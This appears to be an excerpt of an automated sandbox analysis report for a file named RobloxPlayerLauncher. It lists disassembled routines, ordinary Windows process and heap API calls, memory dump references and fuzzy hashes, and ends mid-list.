              • Instruction Fuzzy Hash: FEF08274804A496BDB319BB9DD0CA5B3B9A6F01360F5C4A10F829C60F1EB32ED52CF90

              Control-flow Graph

              APIs
              • GetCurrentProcess.KERNEL32(00000002,?,00A140B5,00A05409,00A05409,?,00000002,6AE65F7C,00A05409,00000002), ref: 00A140CC
              • TerminateProcess.KERNEL32(00000000,?,00A140B5,00A05409,00A05409,?,00000002,6AE65F7C,00A05409,00000002), ref: 00A140D3
              • ExitProcess.KERNEL32 ref: 00A140E5
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: 759ee7fabe2af72b44d82f586e88cc17b1f3853521c7aad4393c23a74f47673d
              • Instruction ID: 3a98890832b10b93a759d7b33ccc4f7f60f1ae0e39bd3c1366169b26979eba62
              • Opcode Fuzzy Hash: 759ee7fabe2af72b44d82f586e88cc17b1f3853521c7aad4393c23a74f47673d
              • Instruction Fuzzy Hash: 3DD05E3D004144BBCF11AFA5DD0D8DC3F2AEF893517104010F90546032CB7688D28A80

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 42 a1a650-a1a678 43 a1a67a-a1a67c 42->43 44 a1a67e-a1a680 42->44 47 a1a6cf-a1a6d2 43->47 45 a1a682-a1a684 44->45 46 a1a686-a1a68d call a1a585 44->46 45->47 49 a1a692-a1a696 46->49 50 a1a6b5-a1a6cc 49->50 51 a1a698-a1a6a6 GetProcAddress 49->51 53 a1a6ce 50->53 51->50 52 a1a6a8-a1a6b3 call a133cc 51->52 52->53 53->47
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID: |_j
              • API String ID: 0-3413345523
              • Opcode ID: 2ea5b227ad1b2843ae7900a68bd59de03641203ddfec6d0624273a3bece22013
              • Instruction ID: ba1b07104893c29c7f65643d25fedcbf0dfff4304bf3c8891f3570b772c6b26a
              • Opcode Fuzzy Hash: 2ea5b227ad1b2843ae7900a68bd59de03641203ddfec6d0624273a3bece22013
              • Instruction Fuzzy Hash: 1601D8377122155FDF168F79EC40ADA33A6EBD53607298121FD25CB158EA31D881C791

              Control-flow Graph

              APIs
              • GetLastError.KERNEL32(00B47218,0000000C), ref: 00A05517
              • ExitThread.KERNEL32 ref: 00A0551E
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorExitLastThread
              • String ID:
              • API String ID: 1611280651-0
              • Opcode ID: 2e9028d6def5c3a72765abca56f2857f784939e4e5d96cf684b97680c196c81c
              • Instruction ID: 85ceacdb8c59b5428d7dbc31fef467feeb4cae1b9a0712499fe23f1e425572a8
              • Opcode Fuzzy Hash: 2e9028d6def5c3a72765abca56f2857f784939e4e5d96cf684b97680c196c81c
              • Instruction Fuzzy Hash: 02F0C274A84604AFDF05EBB0D94AAAF3B75FF85710F100549F0059B2A2CB756D41CF91

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 75 a199dc-a199e5 76 a19a14-a19a15 75->76 77 a199e7-a199fa RtlFreeHeap 75->77 77->76 78 a199fc-a19a13 GetLastError call a041ad call a0424a 77->78 78->76
              APIs
              • RtlFreeHeap.NTDLL(00000000,00000000,?,00A211F5,?,00000000,?,?,00A21496,?,00000007,?,?,00A21A4A,?,?), ref: 00A199F2
              • GetLastError.KERNEL32(?,?,00A211F5,?,00000000,?,?,00A21496,?,00000007,?,?,00A21A4A,?,?), ref: 00A199FD
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorFreeHeapLast
              • String ID:
              • API String ID: 485612231-0
              • Opcode ID: 31e5b3fbc133c8ee10c7ef70eccd77e3b5d3396747ecfa05bdeb9b2ae56a56b7
              • Instruction ID: fb8b4a324697dc0f9d3f5675f5621251165e471ab24f7bd65eeea48243c7b30c
              • Opcode Fuzzy Hash: 31e5b3fbc133c8ee10c7ef70eccd77e3b5d3396747ecfa05bdeb9b2ae56a56b7
              • Instruction Fuzzy Hash: F6E08C76100258ABDB116FE8BC08BCA3B98EF88795F144120F608960A1CB318892CBD4

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 83 a1a29b-a1a2a6 84 a1a2b4-a1a2ba 83->84 85 a1a2a8-a1a2b2 83->85 87 a1a2d3-a1a2e4 RtlAllocateHeap 84->87 88 a1a2bc-a1a2bd 84->88 85->84 86 a1a2e8-a1a2f3 call a0424a 85->86 94 a1a2f5-a1a2f7 86->94 89 a1a2e6 87->89 90 a1a2bf-a1a2c6 call a1723c 87->90 88->87 89->94 90->86 96 a1a2c8-a1a2d1 call a20a25 90->96 96->86 96->87
              APIs
              • RtlAllocateHeap.NTDLL(00000008,?,?,?,00A19DA1,00000001,00000364,?,00000006,000000FF,?,00A05529,00B47218,0000000C), ref: 00A1A2DC
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: cbd9ae37e759fe6b7e8f83093c93c9bcba01c549001da484acb5c95d500a53d0
              • Instruction ID: a27d0a744a43b8d9e65112d378cef025f6b9009a4d35a49d4bfd38ebf3ef9298
              • Opcode Fuzzy Hash: cbd9ae37e759fe6b7e8f83093c93c9bcba01c549001da484acb5c95d500a53d0
              • Instruction Fuzzy Hash: 19F0E9326462246BDB215B669D01BDB375CEFA5770F148122BC04970A1CB72DCC186E6

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 99 a1a2f8-a1a304 100 a1a336-a1a341 call a0424a 99->100 101 a1a306-a1a308 99->101 109 a1a343-a1a345 100->109 102 a1a321-a1a332 RtlAllocateHeap 101->102 103 a1a30a-a1a30b 101->103 105 a1a334 102->105 106 a1a30d-a1a314 call a1723c 102->106 103->102 105->109 106->100 111 a1a316-a1a31f call a20a25 106->111 111->100 111->102
              APIs
              • RtlAllocateHeap.NTDLL(00000000,00A053D6,00A19E0E,?,00A137ED,00B474D8,00000018,00000003), ref: 00A1A32A
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 4aa2cc4699f92b0c95fdabe28bf67f74c7848ea9452648183badc3c623f0ff03
              • Instruction ID: 0c27dd24c3157f9acd721d8779196da8dcd474ae44e4d8d64afae9e4d7ba7471
              • Opcode Fuzzy Hash: 4aa2cc4699f92b0c95fdabe28bf67f74c7848ea9452648183badc3c623f0ff03
              • Instruction Fuzzy Hash: A8E0E53D6062215BD6302BAA9D00BDB365CEF613F0F144121BC219B0C1CB20CC8141E7

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 114 a14fc7-a14ff5 call a2b5f9 call a14d1f 118 a14ffa-a14fff call a2b5d6 114->118
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
